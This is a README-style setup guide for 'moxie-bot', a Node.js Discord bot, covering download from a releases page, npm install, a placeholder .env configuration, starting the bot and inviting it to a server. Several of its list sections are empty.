BJ Sulaiman

🤖 moxie-bot - A Smart Discord Bot for Your Server

📥 Download Now

Download moxie-bot

🚀 Getting Started

Welcome to moxie-bot! This guide will help you download and run this powerful Discord bot easily. moxie-bot is modular and designed to enhance your Discord server with features like moderation, reaction roles, and a ticket system. No technical skills are required.

🔧 System Requirements

Before you begin, make sure your system meets these requirements:

If you do not have Node.js or PostgreSQL installed, you can download them here:

📚 Features

moxie-bot includes:

💾 Download & Install

To get started, visit the Releases page to download the latest version of moxie-bot.

  1. Click on the latest release version.
  2. Download the package suitable for your operating system.
  3. Extract the downloaded files to a folder of your choice.

🔑 Configuration

After downloading, you will need to configure your bot. Follow these steps:

  1. Open a terminal or command prompt.
  2. Navigate to the folder where you extracted moxie-bot.
  3. Run the following command to install dependencies:
    npm install
    
  4. Create a .env file in the root folder to store your Discord bot token and database credentials. Here’s an example structure for the .env file:

    DISCORD_TOKEN=YOUR_DISCORD_BOT_TOKEN
    DATABASE_URL=postgres://user:password@localhost:5432/moxiebot
    
  5. Replace YOUR_DISCORD_BOT_TOKEN with your actual bot token, and adjust the DATABASE_URL with your PostgreSQL details.

🛠 Running the Bot

To start moxie-bot, follow these steps:

  1. In your terminal or command prompt, make sure you are still in the moxie-bot folder.
  2. Type the following command:
    npm start
    
  3. Your bot should now be running. You can check your Discord server to see if the bot is online.

🌐 Add the Bot to Your Discord Server

To invite moxie-bot to your server:

  1. Go to the Discord Developer Portal.
  2. Create a new application and generate an OAuth2 URL.
  3. Make sure to grant necessary permissions, such as sending messages and managing roles.
  4. Use that URL to invite your bot to your desired Discord server.

🎉 Using moxie-bot

Once the bot is running and added to your server, you can start using its features:

For further guidance and feature explanations, refer to the official documentation located in the /docs folder of the repository.

💬 Support

If you encounter any issues, feel free to create an issue on our GitHub Issues page. We welcome any feedback or suggestions.

🌟 Join Our Community

Stay connected with other moxie-bot users. Join us on Discord or other social platforms to share your experiences, tips, and tricks.

Visit Releases Page

Thank you for choosing moxie-bot! Enjoy hosting a better Discord experience.